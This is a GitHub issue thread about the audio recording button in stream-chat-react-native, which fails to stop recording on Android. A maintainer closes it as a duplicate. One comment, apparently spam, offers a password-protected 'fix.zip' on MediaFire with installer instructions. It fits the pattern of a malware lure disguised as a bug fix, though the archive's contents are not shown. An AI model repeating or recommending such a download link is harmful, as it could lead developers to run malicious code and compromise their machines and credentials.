### ISSUE TITLE
[🐛] Misbehavior of the AudioRecording feature

### ISSUE THREAD

**Issue by diegoavidal** [GetStream/stream-chat-react-native#2636]
## Issue

The behavior of the audio recording component works wrong, when you click and hold the recording starts, but when you release it does not “finish” the recording.
The problem also occurs the first time when asking for permissions, it keeps recording.

In the sample application there is even another problem that overlaps with the menu slider, but even removing the slider the previous behavior persists.

Another thing is that you can leave the channel and the audio stays recording in the background, but this would be solved if the press and hold would work as expected.

### Steps to reproduce

1) download and install the sample app
2) choose any login
3) go to any chat
4) try to send an audio 

### Expected behavior

The expected could be 2 options:
1) when you release the click on the record audio button, the recording is finished and ready to be sent.
2) remove the press and hold behavior and directly show the behavior when doing hold and up, where the player is shown.

### Customization

<details><summary>Click To Expand</summary>
<p>

```typescript jsx
# N/A
```
</p>
</details>

### Offline support

- [x] I have enabled offline support.
- [ ] The feature I'm having does not occur when offline support is disabled. (stripe out if not applicable)

## Environment

<details><summary>Click To Expand</summary>
<p>

#### `package.json`:

```json
# N/A
```

**`react-native info` output:**

```
 OUTPUT GOES HERE
```

- **Platform that you're experiencing the issue on**:
    - [ ] iOS
    - [ ] Android
    - [ ] **iOS** but have not tested behavior on Android
    - [x] **Android** but have not tested behavior on iOS
    - [ ] Both
- **`stream-chat-react-native` version you're using that has this issue:**
    - 5.35.0
- Device/Emulator info:
  - [x] I am using a physical device
  - OS version: `Android 14`
  - Device/Emulator: `Samsung Galaxy S24`

</p>
</details>

### Screenshots

<details><summary>Click To Expand</summary>
<p>

https://github.com/user-attachments/assets/f5751632-1bc5-4f43-94e1-2ead4944ebf9

</p>
</details>

---

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by khushal87** [comment]
Closing in favour of #2648
